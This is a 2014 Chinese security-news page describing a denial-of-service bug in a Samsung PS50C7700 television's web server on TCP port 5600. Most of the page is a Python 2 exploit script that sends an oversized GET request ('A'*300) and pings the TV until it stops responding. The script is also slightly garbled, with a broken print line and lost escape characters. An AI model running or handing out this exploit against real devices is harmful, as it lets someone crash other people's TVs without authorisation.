知识屋:更实用的电脑技术知识网站
所在位置:首页 > 网络安全 > 安全资讯

让三星电视拒绝服务(附测试exp)

发布时间:2014-04-28 12:21:58作者:知识屋

用电脑对目标电视端口TCP/5600 Web服务器(DMCRUIS/0.1),发送一个长期的HTTP GET请求使目标电视拒绝服务
 
附测试exp,py源代码
 
#!/usr/bin/python

import httplib

import sys

import os



print "  ***************************************************************************************"

print "  #三星PS50C7700 test"

***************************************************************************************n"



# Sends the payload

print "  Sending the malicious payload...n"

conn = httplib.HTTPConnection(sys.argv[1],5600)

conn.request("GET", "A"*300)

conn.close()



# Checks the response

print "  Checking the status... (CTRL+Z to stop)n"

response = 0

while response == 0:

  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")

  if response != 0:

    print "  Target down!n"

 


(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
收藏
  • 人气文章
  • 最新文章
  • 下载排行榜
  • 热门排行榜